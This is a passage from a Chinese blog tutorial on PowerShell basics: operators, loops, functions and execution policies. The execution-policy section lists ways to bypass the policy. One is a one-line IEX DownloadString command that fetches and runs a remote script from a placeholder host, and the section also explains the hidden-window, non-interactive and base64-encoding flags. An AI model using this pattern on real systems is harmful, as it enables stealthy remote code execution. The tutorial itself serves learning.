<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">+ (加法)</span><br><span class="line">- (减法)</span><br><span class="line">* (乘法)</span><br><span class="line">/ (除法)</span><br><span class="line">% (模数)</span><br></pre></td></tr></table></figure></li>
<li><p>赋值运算符</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">-= (赋值运算符)</span><br><span class="line">+= (加法运算符)</span><br><span class="line">-= (减法赋值运算符)</span><br><span class="line">*= (乘法分配运算符)</span><br><span class="line">/= (部门分配运算符)</span><br><span class="line">%= (模分配运算符)</span><br><span class="line">++ (增量运算符)</span><br><span class="line">- (减量运算符)</span><br></pre></td></tr></table></figure></li>
<li><p>相等运算符</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">-eq</span> (等于)</span><br><span class="line"><span class="operator">-ne</span> (不等于)</span><br><span class="line"><span class="operator">-gt</span> (大于)</span><br><span class="line"><span class="operator">-ge</span> (大于或等于)</span><br><span class="line"><span class="operator">-lt</span> (小于)</span><br><span class="line"><span class="operator">-le</span> (小于或等于)</span><br></pre></td></tr></table></figure></li>
<li><p>匹配运算符</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">-like</span></span><br><span class="line"><span class="operator">-notlike</span></span><br><span class="line"><span class="operator">-match</span></span><br><span class="line"><span class="operator">-notmatch</span></span><br></pre></td></tr></table></figure>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$</span><span class="variable">$</span> = <span class="string">&#x27;aabbccddee44gff&#x27;</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$1</span> = <span class="string">&#x27;cd*&#x27;</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$</span><span class="variable">$</span> <span class="operator">-like</span> <span class="variable">$1</span></span><br><span class="line">True</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$1</span> <span class="operator">-like</span> <span class="variable">$</span><span class="variable">$</span></span><br><span class="line">False</span><br><span class="line"></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span> = <span class="string">&#x27;aabbccdd12233&#x27;</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$b</span> = <span class="string">&#x27;bbc&#x27;</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span> <span class="operator">-like</span> <span class="variable">$b</span></span><br><span class="line">False</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span> <span class="operator">-notlike</span> <span class="variable">$b</span></span><br><span class="line">True</span><br></pre></td></tr></table></figure></li>
<li><p>包含运算符</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">-contains</span></span><br><span class="line"><span class="operator">-notcontains</span></span><br><span class="line"><span class="operator">-in</span></span><br><span class="line"><span class="operator">-notin</span></span><br></pre></td></tr></table></figure></li>
<li><p>逻辑运算符</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">-and</span> (逻辑与)</span><br><span class="line"><span class="operator">-or</span> (逻辑或)</span><br><span class="line"><span class="operator">-xor</span> (逻辑XOR)</span><br><span class="line"><span class="operator">-not</span> (逻辑非)</span><br><span class="line">! (与逻辑非相同，求反)</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="控制语句"><a href="#控制语句" class="headerlink" title="控制语句"></a>控制语句</h2><ul>
<li>if-else<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$value</span> <span class="operator">-eq</span> <span class="number">1</span>)&#123;</span><br><span class="line">    code1</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    code2</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li>while、do-which<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">While</span> () &#123;&#125;</span><br><span class="line"><span class="keyword">while</span>(<span class="variable">$count</span> <span class="operator">-le</span> <span class="number">5</span>)  </span><br><span class="line">&#123;  </span><br><span class="line"> <span class="built_in">echo</span> <span class="variable">$count</span>  </span><br><span class="line"> <span class="variable">$count</span> +=<span class="number">1</span>  </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">Do</span> &#123;&#125; <span class="keyword">While</span>()</span><br><span class="line"><span class="keyword">Do</span>&#123;</span><br><span class="line">    Statement<span class="literal">-1</span>  </span><br><span class="line">    Statement<span class="literal">-2</span>  </span><br><span class="line">    Statement<span class="literal">-N</span>   </span><br><span class="line">&#125; <span class="keyword">while</span>( test_expression)</span><br></pre></td></tr></table></figure></li>
<li>switch<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span>(<span class="variable">$day</span>)  </span><br><span class="line">&#123;  </span><br><span class="line">    <span class="number">1</span>&#123;<span class="built_in">echo</span> <span class="string">&quot;今天是星期一&quot;</span>&#125;  </span><br><span class="line">    <span class="number">2</span>&#123;<span class="built_in">echo</span> <span class="string">&quot;今天是星期二&quot;</span>&#125;  </span><br><span class="line">    <span class="number">3</span>&#123;<span class="built_in">echo</span> <span class="string">&quot;今天是星期三&quot;</span>&#125;  </span><br><span class="line">    <span class="number">4</span>&#123;<span class="built_in">echo</span> <span class="string">&quot;今天是星期四&quot;</span>&#125;  </span><br><span class="line">    <span class="number">5</span>&#123;<span class="built_in">echo</span> <span class="string">&quot;今天是星期五&quot;</span>&#125;  </span><br><span class="line">    <span class="number">6</span>&#123;<span class="built_in">echo</span> <span class="string">&quot;今天是星期六&quot;</span>&#125;  </span><br><span class="line">    <span class="number">7</span>&#123;<span class="built_in">echo</span> <span class="string">&quot;今天是星期日&quot;</span>&#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li>for<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="variable">$x</span>=<span class="number">1</span>; <span class="variable">$x</span> <span class="operator">-lt</span> <span class="number">10</span>; <span class="variable">$x</span>=<span class="variable">$x</span>+<span class="number">1</span>)   </span><br><span class="line">&#123;   </span><br><span class="line"> <span class="built_in">echo</span> <span class="variable">$x</span>   </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li>foreach<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\&gt; <span class="variable">$Array</span> = <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">10</span>  </span><br><span class="line"><span class="built_in">PS</span> C:\&gt; <span class="keyword">foreach</span> (<span class="variable">$number</span> <span class="keyword">in</span> <span class="variable">$Array</span>)  </span><br><span class="line">&gt;&gt; &#123;  </span><br><span class="line">&gt;&gt; <span class="built_in">echo</span> <span class="variable">$number</span>  </span><br><span class="line">&gt;&gt; &#125;</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> [&lt;<span class="title">scope</span>:&gt;]&lt;<span class="title">name</span>&gt; [<span class="params">([type]<span class="variable">$parameter1</span>[,[type]<span class="variable">$parameter2</span>])</span>]</span>  </span><br><span class="line">&#123;  </span><br><span class="line">  <span class="keyword">param</span>([<span class="type">type</span>]<span class="variable">$parameter1</span> [,[<span class="type">type</span>]<span class="variable">$parameter2</span>])  </span><br><span class="line">  <span class="keyword">dynamicparam</span> &#123;&lt;statement list&gt;&#125;  </span><br><span class="line">  <span class="keyword">begin</span> &#123;&lt;statement list&gt;&#125;  </span><br><span class="line">  <span class="keyword">process</span> &#123;&lt;statement list&gt;&#125;  </span><br><span class="line">  <span class="keyword">end</span> &#123;&lt;statement list&gt;&#125;  </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> 函数名（参数列表）</span>&#123;</span><br><span class="line">函数体</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="function"><span class="keyword">function</span> <span class="title">Test-Function</span></span></span><br><span class="line">&gt;&gt; &#123;</span><br><span class="line">&gt;&gt;     <span class="built_in">Write-Host</span> ‘Hello World!’</span><br><span class="line">&gt;&gt; &#125;</span><br><span class="line">&gt;&gt;</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">test-function</span></span><br><span class="line">Hello World!</span><br></pre></td></tr></table></figure>

<h2 id="执行策略"><a href="#执行策略" class="headerlink" title="执行策略"></a>执行策略</h2><ul>
<li>查看当前执行策略、设置执行策略<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">Get-ExecutionPolicy</span></span><br><span class="line">Restricted</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">Set-ExecutionPolicy</span> <span class="literal">-ExecutionPolicy</span> Bypass</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">Get-ExecutionPolicy</span></span><br><span class="line">Bypass</span><br></pre></td></tr></table></figure>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Restricted 	受限制的，可以执行单个的命令，但是不能执行脚本Windows <span class="number">8</span>, Windows Server <span class="number">2012</span>, and Windows <span class="number">8.1</span>中默认就是这种策略，所以是不能执行脚本的，执行就会报错，那么如何才能执行呢？<span class="built_in">Set-ExecutionPolicy</span> <span class="literal">-ExecutionPolicy</span> Bypass就是设置策略为Bypass这样就可以执行脚本了。</span><br><span class="line">AllSigned 	AllSigned 执行策略允许执行所有具有数字签名的脚本</span><br><span class="line">RemoteSigned 	当执行从网络上下载的脚本时，需要脚本具有数字签名，否则不会运行这个脚本。如果是在本地创建的脚本则可以直接执行，不要求脚本具有数字签名。</span><br><span class="line">Unrestricted 	这是一种比较宽容的策略，允许运行未签名的脚本。对于从网络上下载的脚本，在运行前会进行安全性提示。需要你确认是否执行脚本</span><br><span class="line">Bypass 	Bypass 执行策略对脚本的执行不设任何的限制，任何脚本都可以执行，并且不会有安全性提示。</span><br><span class="line">Undefined 	Undefined 表示没有设置脚本策略。当然此时会发生继承或应用默认的脚本策略。</span><br></pre></td></tr></table></figure></li>
<li>绕过策略的常见方法<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">本地读取然后通过管道符运行</span><br><span class="line">powershell <span class="built_in">get-content</span> test.ps1 | powershell <span class="literal">-noprofile</span> -</span><br><span class="line"></span><br><span class="line">远程下载并通过<span class="built_in">IEX</span>运行脚本</span><br><span class="line">powershell <span class="literal">-c</span> <span class="string">&quot;IEX(New-Object Net.WebClient).DownloadString(&#x27;http://xxx.xxx.xxx/a.ps1&#x27;)&quot;</span></span><br><span class="line"></span><br><span class="line">Bypass执行策略绕过</span><br><span class="line">powershell <span class="literal">-executionpolicy</span> bypass <span class="operator">-File</span> ./a.ps1</span><br><span class="line"></span><br><span class="line">Unrestricted执行策略标志</span><br><span class="line">powershell <span class="literal">-executionpolicy</span> unrestricted <span class="operator">-File</span> ./a.ps1</span><br></pre></td></tr></table></figure></li>
<li>注：<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Invoke-Expression</span>（<span class="built_in">IEX</span>的别名）：用来把字符串当作命令执行。</span><br><span class="line"></span><br><span class="line">WindowStyle <span class="keyword">Hidden</span>（<span class="literal">-w</span> <span class="keyword">Hidden</span>）：隐藏窗口</span><br><span class="line"></span><br><span class="line">Nonlnteractive（<span class="literal">-NonI</span>）：非交互模式，PowerShell不为用户提供交互的提示。</span><br><span class="line"></span><br><span class="line">NoProfile（<span class="literal">-NoP</span>）：PowerShell控制台不加载当前用户的配置文件。</span><br><span class="line"></span><br><span class="line">Noexit（<span class="literal">-Noe</span>）：执行后不退出Shell。</span><br><span class="line"></span><br><span class="line">EncodedCommand（<span class="literal">-enc</span>）: 接受base64 encode的字符串编码，避免一些解析问题</span><br></pre></td></tr></table></figure></li>
<li>脚本调用方法<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">如果脚本是直接写的代码而不是只定义了函数那么直接执行脚本.script.ps1即可</span><br><span class="line"></span><br><span class="line">但是如果是载入里面的函数需要.+空格+.script.ps1</span><br><span class="line"></span><br><span class="line">或者使用<span class="built_in">Import-Module</span> .script.ps1, 这样才能直接使用脚本的函数</span><br></pre></td></tr></table></figure></li>
</ul>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><ul>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/87976">https://www.anquanke.com/post/id/87976</a></li>
<li><a target="_blank" rel="noopener" href="https://shu1l.github.io/2020/07/21/powershell-shen-tou-xue-xi/">https://shu1l.github.io/2020/07/21/powershell-shen-tou-xue-xi/</a></li>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5762#toc-5">https://xz.aliyun.com/t/5762#toc-5</a></li>
<li><a target="_blank" rel="noopener" href="https://www.yiibai.com/powershell">https://www.yiibai.com/powershell</a></li>
</ul>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.</span> <span class="toc-text">介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%98%E9%87%8F"><span class="toc-number">2.1.</span> <span class="toc-text">变量</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B0%E7%BB%84"><span class="toc-number">2.2.</span> <span class="toc-text">数组</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%93%88%E5%B8%8C%E8%A1%A8"><span class="toc-number">2.3.</span> <span class="toc-text">哈希表</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%90%E7%AE%97%E7%AC%A6"><span class="toc-number">2.4.</span> <span class="toc-text">运算符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8E%A7%E5%88%B6%E8%AF%AD%E5%8F%A5"><span class="toc-number">2.5.</span> <span class="toc-text">控制语句</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%87%BD%E6%95%B0"><span class="toc-number">2.6.</span> <span class="toc-text">函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E7%AD%96%E7%95%A5"><span class="toc-number">2.7.</span> <span class="toc-text">执行策略</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">3.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&text=powershell了解"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&is_video=false&description=powershell了解"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=powershell了解&body=Check out this article: http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&name=powershell了解&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&t=powershell了解"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2017-2022
    kzaopa
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Archives</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
